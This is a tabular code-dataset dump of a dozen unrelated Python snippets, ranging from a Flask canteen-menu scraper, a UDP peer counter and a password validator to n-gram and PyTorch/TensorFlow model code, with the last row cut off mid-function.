index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
4,800 | 139ccdaf7acb2a2d74649f0c32217d1fe71a954a | from flask import Blueprint
views = Blueprint('views', __name__)
from . import routes |
4,801 | 9ce406124d36c2baf09cf0d95fceb2ad63948919 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START gae_python37_app]
from flask import Flask
from bs4 import BeautifulSoup
import requests
import datetime
import regex as re
import unicodedata
from pyopenmensa import feed as op
from lxml import etree
class UnexpectedFormatError(AttributeError):
pass
WARNING = 'No Mensa path!'
CATEGORY_KEY = "cat"
MAIN_MEAL_KEY = "mm"
ADDITION_KEY = "a"
PRICE_KEY = "p"
DATE_KEY = "d"
STUDENT_KEY = "student"
EMPLOYEE_KEY = "employee"
MENSAE = ["westerberg", "mschlossg", "mhaste", "mvechta"]
def get_meals(_mensa, date=None):
    """Scrape the my-mensa.de page for one canteen and return its meals.

    Each meal is a dict keyed by the module-level CATEGORY/MAIN_MEAL/ADDITION/
    PRICE/DATE key constants. If `date` (a datetime) is given, only meals for
    that day are returned.

    Raises ConnectionError on a non-200 response and UnexpectedFormatError
    when the page layout does not match expectations.
    """
    result = requests.get(f"https://osnabrueck.my-mensa.de/essen.php?v=5121119&hyp=1&lang=de&mensa={_mensa}")
    if result.status_code == 200:
        content = result.content
    else:
        raise ConnectionError
    b_soup = BeautifulSoup(content, "html.parser")
    # meal links look like "...mensa=<name>#<name>_tag_20<yyddd>_essen"
    unparsed_meals = b_soup.find_all(
        href=lambda href: href and re.compile(f"mensa={_mensa}#{_mensa}_tag_20\d{{3,5}}_essen").search(href))
    _meals = []
    for meal in unparsed_meals:
        # the category heading sits just before the meal's parent element
        category = meal.parent.previous_sibling.previous_sibling.text
        meal_info = meal.find_all(["h3", "p"])
        if len(meal_info) != 3:
            raise UnexpectedFormatError("More than 3 meal info")
        # normalize unicode and strip soft hyphens from the scraped text
        meal_info = [unicodedata.normalize("NFKD", info.text).replace("\xad", "") for info in meal_info]
        _main_meal, _additional, price = meal_info
        if price == "-":
            price = {}
        else:
            # "<student price> ... <employee price>"; either part may be "-"
            price_search = re.compile("((\d+,\d{2})|-)\D*((\d+,\d{2})|-)").search(price)
            if not price_search:
                raise UnexpectedFormatError(f"price formation error {price}")
            try:
                # groups 2/4 are None when the corresponding part was "-"
                stud_price_str = price_search.group(2)
                emp_price_str = price_search.group(4)
                price = {STUDENT_KEY: float(stud_price_str.replace(",", ".")) if stud_price_str else None,
                         EMPLOYEE_KEY: float(emp_price_str.replace(",", ".")) if emp_price_str else None}
            except ValueError:
                raise UnexpectedFormatError(f"price formation error {price_search.groups()}")
        # the href encodes year and day-of-year: tag_<yyyy><d..ddd>
        date_search = re.compile("tag_(\d{4})(\d{1,3})").search(meal["href"])
        if not date_search:
            raise UnexpectedFormatError(f"Date formation error{meal['href']}")
        try:
            year, day = [int(group) for group in date_search.groups()]
        except ValueError:
            raise UnexpectedFormatError(f"Date formation error {year}, {day}")
        if date:
            # filter: compare requested date's day-of-year and year
            date_days = (date - datetime.datetime(date.year, 1, 1)).days
            if date_days != day or year != date.year:
                continue
        meal_date = datetime.datetime(year, 1, 1) + datetime.timedelta(day)
        _meals.append({CATEGORY_KEY: category, MAIN_MEAL_KEY: _main_meal,
                       ADDITION_KEY: _additional, PRICE_KEY: price, DATE_KEY: meal_date.date()})
    return _meals
def get_total_feed(mensa):
    """Build an OpenMensa XML feed for one canteen.

    Ingredient markers like "(1,a)" are stripped from the meal texts and
    re-emitted (sorted, de-duplicated) as an extra note.
    """
    canteen = op.LazyBuilder()
    meals = get_meals(mensa)
    for meal in meals:
        main_meal = meal[MAIN_MEAL_KEY]
        additional = meal[ADDITION_KEY]
        # matches "(...)" containing comma-separated numbers or letters a-n
        ing_reg = re.compile("\(((\d+|[a-n])(,(\d+|[a-n]))*)\)")
        # noinspection PyTypeChecker
        ingredients_match = ing_reg.findall(main_meal + " " + additional)
        # findall yields group tuples; element 0 is the full marker list
        ingredients = list(set(",".join([ingred[0] for ingred in ingredients_match]).split(",")))
        ingredients.sort()
        ingredients = ",".join(ingredients)
        main_meal = ing_reg.sub("", main_meal)
        additional = ing_reg.sub("", additional)
        notes = [note for note in [additional, ingredients] if len(note) > 0]
        # drop roles whose price is None (price "-" on the page)
        prices = {role: price for role, price in meal[PRICE_KEY].items() if price}
        canteen.addMeal(meal[DATE_KEY], meal[CATEGORY_KEY], main_meal,
                        notes if len(notes) > 0 else None, prices)
    return canteen.toXMLFeed()
def validate(xml_data):
    """Validate the generated feed against the OpenMensa v2 XML schema.

    Expects open-mensa-v2.xsd in the working directory. Raises
    UnexpectedFormatError when the document is malformed or schema-invalid.
    """
    # with open("open-mensa-v2.xsd", 'r') as schema_file:
    #     xml_schema_str = schema_file.read()
    #
    # xml_schema_doc = etree.parse(StringIO(xml_schema_str))
    # xml_schema = etree.XMLSchema(StringIO(xml_schema_doc))
    # parse xml
    try:
        xml_schema_doc = etree.parse("./open-mensa-v2.xsd")
        xml_schema = etree.XMLSchema(xml_schema_doc)
        # doc = etree.parse(xml_data.encode())
        print('XML well formed, syntax ok.')
        # parsing with a schema-aware parser performs validation as a side effect
        etree.fromstring(xml_data.encode(), parser=etree.XMLParser(schema=xml_schema))
        # xml_schema.assertValid(doc)
        print('XML valid, schema validation ok.')
    # check for XML syntax errors
    except etree.XMLSyntaxError as err:
        raise UnexpectedFormatError(err)
    except etree.DocumentInvalid as err:
        print('Schema validation error, see error_schema.log')
        raise UnexpectedFormatError(err)
# If `entrypoint` is not defined in app.yaml, App Engine will look for an app
# called `app` in `main.py`.
app = Flask(__name__)
@app.route(f'/<mensa>')
def mensa_feed(mensa):
    """Serve the validated OpenMensa feed for one canteen; WARNING for unknown names."""
    if mensa not in MENSAE:
        return WARNING
    feed = get_total_feed(mensa)
    # raises UnexpectedFormatError if the generated feed is not schema-valid
    validate(feed)
    return feed
@app.route('/')
@app.route('/index')
def mensa_list():
    """Index route: emit an XML error document listing the valid mensa names.

    BUG FIX: the original template contained stray '"' characters after
    </list-desc> and </debug-data>, wrapped the XML declaration in literal
    quotes, and embedded HTTP status/header lines inside the response body --
    none of which produce well-formed XML. Status and content type are now
    returned as a proper Flask (body, status, headers) tuple instead.
    """
    # one <list-item> per known mensa, indented to line up with the template
    mensae = "\n        ".join(["<list-item>" + mensa + "</list-item>" for mensa in MENSAE])
    body = f"""<?xml version="1.0" encoding="UTF-8"?>
<error>
    <code>404</code>
    <message>Mensa not found</message>
    <debug-data>
        <list-desc>Valid filenames</list-desc>
        {mensae}
    </debug-data>
</error>"""
    return body, 404, {"Content-Type": "application/xml; charset=utf-8"}
if __name__ == '__main__':
# This is used when running locally only. When deploying to Google App
# Engine, a webserver process such as Gunicorn will serve the app. This
# can be configured by adding an `entrypoint` to app.yaml.
app.run(host='127.0.0.1', port=8080, debug=True)
# [END gae_python37_app]
|
4,802 | 3cb96607aaf58a7de3fa0a9cd61b7f4e3c6b061a | import daemon
import time
import sys
#out = open("~/tmp/stdout", "a+")
#err = open("~/tmp/stderr", "a+")
# If stdout/stderr are bound to the current terminal, closing the terminal
# window terminates the daemon; Ctrl+C does NOT stop the process.
# Closing the terminal window exits the daemon.
def do_main_program():
    """Daemon body: print a heartbeat line once per second, forever."""
    print("start the main program...")
    while True:
        time.sleep(1)
        print('another second passed')
# Run do_main_program() inside a daemon context; stdout/stderr are deliberately
# kept on the launching terminal so the heartbeat output remains visible.
context = daemon.DaemonContext()
context.stdout = sys.stdout
context.stderr = sys.stderr
with context:
    print("start the main program")
    do_main_program()
print("end ") |
4,803 | 7e8b192e77e857f1907d5272d03c1138a10c61f4 | import rasterio as rio
from affine import Affine
colour_data = []  # accumulates [x, y, band-1 value] rows (module-level by design)


def generate_colour_data(width, height, imagiry_data, pixel2coord):
    """Extract color data from the .tiff file into the module-level colour_data list.

    Each appended row is [x, y, value] where (x, y) comes from pixel2coord(col, row)
    and value is the band-1 sample at that pixel.
    """
    # PERF FIX: read band 1 exactly once -- the original called
    # imagiry_data.read([1]) inside the inner loop, re-reading the whole
    # raster for every single pixel.
    band = imagiry_data.read([1])[0]
    # NOTE(review): ranges start at 1 and index with i-1/j-1, so the last row
    # and column are never emitted -- confirm whether that is intentional.
    for i in range(1, height):
        for j in range(1, width):
            x, y = pixel2coord(j, i)
            colour_data.append([x, y, band[i - 1][j - 1]])
#Code that will extract the width, height and transformation information of the .tiff file and pass it to the function
# generate_colour_data which will populate the color data in a list in the following format: [longitude, latitude, Red, Green, Blue, Alpha]
with rio.open(r'C:\Users\user.DESKTOP-OMQ89VA\Documents\USGS-LIDAR-\data\iowa.tif') as imagery_data:
T0 = imagery_data.transform
T1 = T0 * Affine.translation(0.5, 0.5)
pixel2coord = lambda c, r: (c, r) * T1
width = imagery_data.width
height = imagery_data.height
generate_colour_data(width, height, imagery_data, pixel2coord)
|
4,804 | 68b9f7317f7c6dcda791338ee642dffb653ac694 | import socket
import time
import sys
def main():
    """UDP-broadcast discovery demo: count other running copies of this script.

    Announces itself with "IBORN", replies "ILIVE" to newcomers, tracks the
    live count for ten seconds, then broadcasts "IEXIT" and reports the count.
    """
    if len(sys.argv) != 2:
        # BUG FIX: the original printed the literal "%s" -- the program name
        # was never substituted into the usage string.
        print("usage : %s port" % sys.argv[0])
        sys.exit()
    port = int(sys.argv[1])
    count = 0
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.settimeout(2)
    sock.bind(('', port))
    # BUG FIX: compute our own (host, port) identity once, up front. The
    # original assigned `me` only inside the IBORN branch, so an initial
    # "ILIVE"/"IEXIT" message raised UnboundLocalError.
    me = (socket.gethostbyname(socket.gethostname()), sock.getsockname()[1])
    sock.sendto(bytes("IBORN", "utf-8"), ('255.255.255.255', port))
    lifetime = time.time() + 10  # run for ten seconds
    while time.time() < lifetime:
        try:
            message, address = sock.recvfrom(1024)
            message = message.decode("utf-8")
            print("Message : %s from : %s" % (message, str(address)))
            if message == "IBORN":
                sock.sendto(bytes("ILIVE", "utf-8"), address)
                print(address)
                if address != me:
                    count += 1
                    print("Current count of copies : %s" % count)
            elif message == "ILIVE":
                if address != me:
                    count += 1
                    print("Current count of copies : %s" % count)
            elif message == "IEXIT":
                if address != me:
                    count -= 1
                    print("Current count of copies : %s" % count)
        except socket.timeout:
            print("No new messages in 2 seconds.")
        time.sleep(1)
    sock.sendto(bytes("IEXIT", "utf-8"), ('255.255.255.255', port))
    print("Count at exit : %s" % count)
|
4,805 | 69cf28d32e6543271a0855d61a76808b03c06891 | '''
3、 编写一个函数,输入n为偶数时,调用函数求1/2+1/4+...+1/n,当输入n为奇数时,调用函数1/1+1/3+...+1/n
'''
def f(n):
if n%2==0:
sum=0
for x in range(2,n+1,2):
sum+=1/x
print(sum)
if n%2!=0:
sum=0
for x in range(1,n+1,2):
sum+=1/x
print(sum)
|
4,806 | d1944493b7f3e74462ca0163a8c0907e4976da06 | # Problem statement here: https://code.google.com/codejam/contest/975485/dashboard#s=p0
# set state of both bots
# for instruction i
# look at this instruction to see who needs to press their button now
# add walk time + 1 to total time
# decriment walk time of other bot by walk time +1 of current bot (rectify if negative)
# get new target pos for current bot
# update walk time of current bot
input_file = 'large_practice.in'
test_sequences = []
with open(input_file) as f:
test_num = int(f.readline())
for t in range(test_num):
test_sequences.append([])
prob_def = f.readline().split()
prob_size = int(prob_def.pop(0))
for i in range(prob_size):
test_sequences[t].append((prob_def.pop(0), int(prob_def.pop(0))))
def solve_sequence(seq):
    """Return the minimum total time to execute one test case's button sequence.

    seq is a list of (bot, position) pairs; bots 'O' and 'B' both start at
    position 1, walk one position per time unit (concurrently), and a press
    takes 1 time unit. Per-bot state is [current_pos, walk_time], where
    walk_time is the remaining travel time to the bot's next target.
    """
    O_init_walk_time = 0
    B_init_walk_time = 0
    # initial travel: distance from position 1 to each bot's first target;
    # next_pos raises if a bot never presses, in which case it just stays put
    try:
        O_init_walk_time = abs(next_pos('O', 0, seq)-1)
    except Exception:
        pass
    try:
        B_init_walk_time = abs(next_pos('B', 0, seq)-1)
    except Exception:
        pass
    states = {'O': [1, O_init_walk_time], 'B': [1, B_init_walk_time]} # state format [current_pos, walk_time]
    total_time = 0
    for instruction in range(len(seq)):
        target_bot, target_pos = seq[instruction]
        walk_time = states[target_bot][1]
        # finish walking, then press the button (+1)
        total_time += walk_time+1
        # the other bot walked concurrently during that time; clamp at zero
        states[other_bot(target_bot)][1] -= walk_time+1
        states[other_bot(target_bot)][1] = max(0, states[other_bot(target_bot)][1])
        states[target_bot][0] = target_pos
        # schedule this bot's walk toward its next target, if it has one
        try:
            states[target_bot][1] = abs(next_pos(target_bot, instruction+1, seq)-states[target_bot][0])
        except Exception:
            pass
    return total_time
def next_pos(target_bot, instruction_ind, seq):
    """Return the button position of the next instruction addressed to
    target_bot at or after instruction_ind; raise if there is none."""
    for idx in range(instruction_ind, len(seq)):
        bot_name, button_pos = seq[idx]
        if bot_name == target_bot:
            return button_pos
    raise Exception("Next position not found for {}. (len(seq)=={}, instruction_ind={}, seq={})".format(target_bot, len(seq), instruction_ind, seq))
def other_bot(bot_name):
    """Return the name of the other robot ('O' <-> 'B')."""
    return 'B' if bot_name == 'O' else 'O'
if __name__ == '__main__':
for i, seq in enumerate(test_sequences):
print('Case #{}: {}'.format(i+1, solve_sequence(seq)))
|
4,807 | d72f9d521613accfd93e6de25a71d188626a0952 | """
Password Requirements
"""
# Write a Python program called "pw_validator" to validate a password based on the security requirements outlined below.
# VALIDATION REQUIREMENTS:
## At least 1 lowercase letter [a-z]
## At least 1 uppercase letter [A-Z].
## At least 1 number [0-9].
## At least 1 special character [~!@#$%&*].
## Min length 6 characters.
## Max length 16 characters.
def pw_validator(pw):
    """Validate a password against the security requirements.

    Requirements: 6-16 characters, and at least one of each of
    [a-z], [A-Z], [0-9], and the specials ~!@#$%&*.
    Returns 'Success!' when valid, otherwise 'Please enter a valid password.'

    FIXES vs. the original: removed the pointless in-place mutation
    (pw[idx] = int(i) keyed on the *first* occurrence via list.index, which
    only worked by accident) and the unused idx assignments; replaced the
    four counters with any() scans.
    """
    invalid = 'Please enter a valid password.'
    if not 6 <= len(pw) <= 16:
        return invalid
    # ASCII-only character classes, matching the original's literal sets
    has_digit = any(c in '0123456789' for c in pw)
    has_lower = any(c in 'abcdefghijklmnopqrstuvwxyz' for c in pw)
    has_upper = any(c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' for c in pw)
    has_special = any(c in '~!@#$%&*' for c in pw)
    if has_digit and has_lower and has_upper and has_special:
        return 'Success!'
    return invalid
# < 6 char
a = pw_validator('abc')
print(f'abc: {a}')
# > 16 char
b = pw_validator('1234567890abcdefg')
print(f'1234567890abcdefg: {b}')
# no numbers
c = pw_validator('@bcdEFGh!j')
print(f'@bcdEFGh!j: {c}')
# no lowercase letters
d = pw_validator('@BCD3EFGH!J')
print(f'@BCD3EFGH!J: {d}')
# no uppercase letters
e = pw_validator('@bcd3efgh!j')
print(f'@bcd3efgh!j: {e}')
# no special characters
f = pw_validator('Abcd3FGhIj112')
print(f'Abcd3FGhIj112: {f}')
# valid pw
g = pw_validator('P$kj35S&7')
print(f'P$kj35S&7: {g}') |
4,808 | 1855351b20c7965a29864502e4489ab4324c7859 | # -*- coding: utf-8 -*-
"""
Created on Thu Dec 17 13:07:47 2020
@author: mmm
"""
n = 2    # lower bound (inclusive)
n1 = 10  # upper bound (exclusive)
# Print every prime in [n, n1) by trial division.
# BUG FIX: the original had `if (i % j != 0):` with an empty body followed by
# a dangling `else:` -- a SyntaxError. The intended logic is the classic
# for/else idiom: break on the first divisor, print only when none was found.
for i in range(n, n1):
    for j in range(2, i):
        if i % j == 0:
            break
    else:
        print(i)
|
4,809 | 74a0282495bf4bbd34b397e0922074659a66d6ff | #coding=utf-8
from django.contrib import admin
from models import *
# Extra admin action, selectable from the admin changelist
def make_published(modeladmin, request, queryset):
    # bulk action: mark every selected order as published (state=1)
    queryset.update(state=1)
class OrderInfoAdmin(admin.ModelAdmin):
    # columns shown on the order changelist
    list_display = ('ordernum', 'total', 'state')
    search_fields = ('total', )
    list_filter = ('bpub_date',)
    actions = [make_published]
class address_infoAdmin(admin.ModelAdmin):
    # the soft-delete flag is managed in code, so hide it from the edit form
    exclude = ('isDelete',)
# 2017/01/05: register the models with the admin site
admin.site.register(cart)
admin.site.register(address_info,address_infoAdmin)
admin.site.register(OrderInfo,OrderInfoAdmin)
admin.site.register(OrderDetailInfo)
admin.site.register(GoodsInfo)
|
4,810 | f92b939bf9813e5c78bc450ff270d5fb6171792a | import tensorflow as tf
from vgg16 import vgg16
def content_loss(content_layer, generated_layer):
    """Content loss between two activation maps: 0.5 * sum((a - b)^2).

    tf.scalar_mul keeps the result a graph op (TF1-style code).
    """
    squared_error = tf.nn.l2_loss(content_layer - generated_layer)
    return tf.scalar_mul(.5, squared_error)
def style_loss(style_layers, generated_layers, weights):
    """Weighted Gram-matrix style loss over four layers (neural style transfer).

    NOTE(review): assumes NHWC activations -- N is the channel count
    (shape[3]) and M the spatial size (shape[1] * shape[2]); confirm against
    the vgg16 layer outputs. Also note the factor here is 4/(M^2 N^2) while
    Gatys et al. use 1/(4 N^2 M^2) -- verify which is intended.
    """
    layer_losses = []
    for index in [0, 1, 2, 3]:
        reference_layer = style_layers[index]
        generated_image_layer = generated_layers[index]
        N = reference_layer.shape[3]
        M = reference_layer.shape[1] * reference_layer.shape[2]
        # layer_losses.append(weights[index] * (4 / (M**2 * N**2)) * tf.nn.l2_loss(get_gram_matrix(reference_layer, N) - get_gram_matrix(generated_image_layer, N)))
        layer_losses.append(tf.scalar_mul(weights[index] * 4 / (M**2 * N**2), tf.nn.l2_loss(get_gram_matrix(reference_layer, N) - get_gram_matrix(generated_image_layer, N))))
    return sum(layer_losses)
def get_gram_matrix(matrix, num_filters):
    """Gram matrix of a feature map: flatten spatial dims, then G = F^T F."""
    # first vectorize the matrix
    matrix_vectorized = tf.reshape(matrix, [-1, num_filters])
    # then calculate the gram by multiplying the vector by its transpose
    return tf.matmul(tf.transpose(matrix_vectorized), matrix_vectorized)
# def run_vgg(sess, image):
# print "making the template", image.shape
# imgs = tf.placeholder(tf.float32, [None, 224, 224, 3])
# net = vgg16(imgs, 'vgg16_weights.npz', sess)
# print "model loaded"
# # net = VGG16({'data': image})
# # net.load(model_data_path, session)
# # session.run(net.get_output(), feed_dict={input_node: image})
# sess.run(net.probs, feed_dict={net.imgs: image})
# return net
|
4,811 | 85c97dfeb766f127fa51067e5155b2da3a88e3be | s = input()
ans = 0
t = 0
for c in s:
if c == "R":
t += 1
else:
ans = max(ans, t)
t = 0
ans = max(ans, t)
print(ans)
|
4,812 | 41e3c18b02f9d80f987d09227da1fbc6bde0ed1d | from __future__ import division
import abc
import re
import numpy as np
class NGram(object):
SEP = ''
def __init__(self, n, text):
self.n = n
self.load_text(text)
self.load_ngram()
@abc.abstractmethod
def load_text(self, text):
pass
def load_ngram(self):
counts = self.empty_count()
c = self.n
while c < len(self.text):
l = self.text[c]
p = '^'.join(self.prev_n(c))
if l:
if p not in counts[l]:
counts[l][p] = 1
else:
counts[l][p] += 1
c += 1
self.counts = counts
def get_count(self, x, y=''):
if len(y) > self.n:
# raise RuntimeError('Invalid n-gram')
return 0
elif len(y) == self.n:
p = '^'.join(y)
if x in self.counts and p in self.counts[x]:
return self.counts[x][p]
else:
return 0
else:
p = '^'.join(y)
count = 0
if x in self.counts:
for x_prev in self.counts[x].keys():
if x_prev[-len(p):] == p:
count += self.counts[x][x_prev]
return count
def prev_n(self, i):
return self.text[i - self.n: i]
def empty_count(self):
s = {}
return { c: dict() for c in self.cols() }
def generate_sentence(self, length):
c = length
s = []
while c > 0:
if len(s) < self.n:
sampling = self.sample(s)
else:
sampling = self.sample(s[(len(s) - self.n):])
s.append(sampling)
c -= 1
return self.SEP.join(s)
def sample(self, previous):
assert len(previous) <= self.n
tokens, distribution = self.distribution('^'.join(previous))
i = np.nonzero(np.random.multinomial(1, distribution))[0][0]
return tokens[i]
def distribution(self, previous):
tokens = []
counts = []
for token in self.counts.keys():
count = self.get_count(token, previous)
tokens.append(token)
counts.append(count)
s = sum(counts)
probability = s and (lambda c: c / s) or (lambda c: 1/len(counts))
return (tokens, map(probability, counts))
@abc.abstractmethod
def cols(self):
pass
@staticmethod
def clean(text):
s = text.lower()
s = re.sub(r'\n', ' ', s)
s = re.sub(r'[^a-z ]+', ' ', s)
return s
|
4,813 | ae9f1c4f70801dace0455c051ba4d4bfb7f3fe67 | from django.core import management
from django.conf import settings
def backup_cron():
    """Run the dbbackup management command, but only when a backup storage is configured."""
    # BUG FIX: the original used `is not ''` -- an identity comparison against
    # a literal, which is implementation-defined (and a SyntaxWarning on
    # modern CPython). Use an equality test.
    if settings.DBBACKUP_STORAGE != '':
        management.call_command('dbbackup')
|
4,814 | 7821b07a49db9f3f46bedc30f2271160e281806f | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision import datasets, transforms, models
from torchvision.utils import make_grid
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import os
from PIL import Image
from IPython.display import display
import warnings
warnings.filterwarnings('ignore')
train_transform = transforms.Compose([
# transforms.RandomRotation(10),
# transforms.RandomHorizontalFlip(),
# transforms.Resize(224),
# transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
dataset = datasets.ImageFolder('shapes_dataset_LR',transform=train_transform)
torch.manual_seed(42)
train_data, test_data = torch.utils.data.random_split(dataset, [9000, 1000])
class_names = dataset.classes
train_loader = DataLoader(train_data, batch_size = 10, shuffle = True)
test_loader = DataLoader(test_data, batch_size = 10)
for images, labels in train_loader:
break
im = make_grid(images, nrow=5)
inv_normalize = transforms.Normalize(
mean=[-0.485/0.229, -0.486/0.224, -0.406/0.225],
std=[1/0.229, 1/0.224, 1/0.225]
)
im_inv = inv_normalize(im)
print(labels)
plt.figure(figsize=(12,4))
plt.imshow(np.transpose(im_inv.numpy(), (1,2,0)))
plt.show()
class ConvolutionalNetwork(nn.Module):
    """Two conv+pool stages followed by three fully-connected layers.

    Expects 3x224x224 inputs (224 -> 222 -> 111 -> 109 -> 54 spatially) and
    produces log-probabilities over 2 classes.
    """
    def __init__(self):
        super().__init__()
        self.conv1 = nn.Conv2d(3, 6, 3, 1)
        self.conv2 = nn.Conv2d(6, 16, 3, 1)
        self.fc1 = nn.Linear(54 * 54 * 16, 120)
        self.fc2 = nn.Linear(120, 84)
        self.fc3 = nn.Linear(84, 2)

    def forward(self, X):
        out = F.max_pool2d(F.relu(self.conv1(X)), 2, 2)
        out = F.max_pool2d(F.relu(self.conv2(out)), 2, 2)
        out = out.view(-1, 54 * 54 * 16)  # flatten for the classifier head
        out = F.relu(self.fc1(out))
        out = F.relu(self.fc2(out))
        return F.log_softmax(self.fc3(out), dim=1)
torch.manual_seed(101)
CNNmodel = ConvolutionalNetwork()
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(CNNmodel.parameters(), lr=0.001)
# # to count each class in validation set
# arr = np.array(np.array(dataset.imgs)[test_data.indices, 1], dtype=int)
# cnt = np.zeros((6,1), dtype = int)
# for i in range(1000):
# for j in range(6):
# if arr[i] == j:
# cnt[j] += 1
# break
# print(cnt)
# for reproducable results
seed = 42
np.random.seed(seed)
torch.manual_seed(seed)
#The compose function allows for multiple transforms
#transforms.ToTensor() converts our PILImage to a tensor of shape (C x H x W) in the range [0,1]
#transforms.Normalize(mean,std) normalizes a tensor to a (mean, std) for (R, G, B)
# transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
#
# train_set = torchvision.datasets.CIFAR10(root='./cifardata', train=True, download=True, transform=transform)
#
# test_set = torchvision.datasets.CIFAR10(root='./cifardata', train=False, download=True, transform=transform)
#
# classes = ('0', '1', '2', '3', '4', '5')
# x = torch.rand(5, 3)
# print(x) |
4,815 | fa7246a4e7595393ca9aaec777fa85d782bb816e |
n = 0.3  # step size (learning rate) for the descent update
c = 2    # exponent: we minimise f(x) = x**c
def func(x):
    """Objective f(x) = x**c."""
    return x**c
def der_func(x):
    """Derivative f'(x) = c * x**(c-1)."""
    return c * x**(c - 1)
def na_value(x):
    """One gradient-descent step: x - n * f'(x)."""
    return x - n*der_func(x)
def main():
    """Run 10 descent steps from x=100, tracking the smallest value seen."""
    x = 100
    v_min = func(x)
    for i in range(10):
        cur_v = func(x)
        x = na_value(x)
        # NOTE(review): cur_v is the value *before* this step's update, so the
        # final x's objective value is never considered -- confirm intent.
        if cur_v < v_min:
            v_min = cur_v
        print("----> " ,i ," cur = ",cur_v," x = ",x," v_min = " ,v_min )
main() |
4,816 | 4296dc5b79fd1d2c872eb1115beab52a0f067423 | # ----------------------------------------------------------------------------
# Copyright (c) 2016-2018, q2-chemistree development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import unittest
from q2_chemistree.plugin_setup import plugin as chemistree_plugin
class PluginSetupTests(unittest.TestCase):
    """Smoke test: the q2-chemistree plugin registers under the expected name."""
    def test_plugin_setup(self):
        self.assertEqual(chemistree_plugin.name, 'chemistree')
4,817 | e85f203e71c8fdad86bd82b19104263cca72caf1 | from hierarchical_envs.pb_envs.gym_locomotion_envs import InsectBulletEnv
import argparse
import joblib
import tensorflow as tf
from rllab.misc.console import query_yes_no
# from rllab.sampler.utils import rollout
#from pybullet_my_envs.gym_locomotion_envs import Ant6BulletEnv, AntBulletEnv, SwimmerBulletEnv
from hierarchical_envs.pb_envs.gym_locomotion_envs import InsectBulletEnv, AntBulletEnv, SwimmerBulletEnv
from rllab.envs.gym_wrapper import GymEnv
import numpy as np
from rllab.misc import tensor_utils
import time
north_x = 0
north_y = 1e3
def simple_high(states):
    """Hand-written high-level policy: pick a heading toward the target.

    states is (x, y, target_x, target_y). Returns an angle in radians:
    0 (east) while far left of the target, pi (west) while far right,
    otherwise +/- pi/2 to close the y gap. The 50-unit band around target_x
    acts as a dead zone before turning north/south.
    """
    x, y, target_x, target_y = states
    if x < target_x - 50:
        return 0
    if x > target_x + 50:
        return np.pi
    return np.pi / 2 if y < target_y else -np.pi / 2
def rollout(env, pi_low, pi_high, tx=700, ty=0, max_path_length=np.inf, animated=False, speedup=1,
            always_return_paths=False):
    """Roll out a hierarchical policy: pi_high picks a heading toward (tx, ty),
    pi_low turns the heading-augmented observation into an action.

    Returns a dict of stacked trajectory tensors, or None when only animating.
    """
    observations = []
    actions = []
    rewards = []
    agent_infos = []
    env_infos = []
    o = env.reset()
    x, y, z = env.robot.body_xyz
    r, p, yaw = env.robot.body_rpy
    # angle from the robot to the target (informational; not used below)
    target_theta = np.arctan2(
        ty - y,
        tx - x)
    angle_to_target = target_theta - yaw
    print('direction: ', o[0], o[1])
    path_length = 0
    if animated:
        env.render()
    while path_length < max_path_length:
        a_high = pi_high([x, y, tx, ty])
        # BUG FIX: `feed_o` was never initialized in the original (NameError on
        # the first iteration) -- rebuild it from the current observation
        # before overwriting the two direction components.
        feed_o = np.array(o, copy=True)
        feed_o[0] = np.cos(a_high)  # get direction
        feed_o[1] = np.sin(a_high)
        # BUG FIX: the original called an undefined `agent`; the low-level
        # policy passed in as pi_low is the acting agent here.
        a, agent_info = pi_low.get_action(feed_o)
        next_o, r, d, env_info = env.step(a)
        # NOTE(review): refresh the position fed to the high-level policy; the
        # original never updated x/y after reset -- confirm against pb_envs API.
        x, y, z = env.robot.body_xyz
        observations.append(env.observation_space.flatten(o))
        rewards.append(r)
        actions.append(env.action_space.flatten(a))
        agent_infos.append(agent_info)
        env_infos.append(env_info)
        path_length += 1
        if d:
            break
        o = next_o
        if animated:
            env.render()
            timestep = 0.05
            time.sleep(timestep / speedup)
    if animated and not always_return_paths:
        return
    return dict(
        observations=tensor_utils.stack_tensor_list(observations),
        actions=tensor_utils.stack_tensor_list(actions),
        rewards=tensor_utils.stack_tensor_list(rewards),
        agent_infos=tensor_utils.stack_tensor_dict_list(agent_infos),
        env_infos=tensor_utils.stack_tensor_dict_list(env_infos),
    )
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('low_level', type=str,
                        help='path to lower_level policy')
    parser.add_argument('--max_path_length', type=int, default=500,
                        help='Max length of rollout')
    parser.add_argument('--speedup', type=float, default=1,
                        help='Speedup')
    args = parser.parse_args()
    # BUG FIX: the positional argument is named 'low_level'; the original
    # read `args.file`, which raised AttributeError.
    data = joblib.load(args.low_level)
    pi_low = data['policy']
    pi_high = simple_high
    env = GymEnv(InsectBulletEnv(render=True, d=0.75, r_init=None, d_angle=True))
    while True:
        path = rollout(env, pi_low, pi_high, max_path_length=args.max_path_length,
                       animated=True, speedup=args.speedup)
        if not query_yes_no('Continue simulation?'):
            break
|
4,818 | 2b3983fd6a8b31604d6d71dfca1d5b6c2c7105e0 | import pandas as pd
import requests
import re
from bs4 import BeautifulSoup
from datetime import datetime
nbaBoxUrl = 'https://www.basketball-reference.com/boxscores/'
boxScoreClass = 'stats_table'
def getBoxScoreLinks():
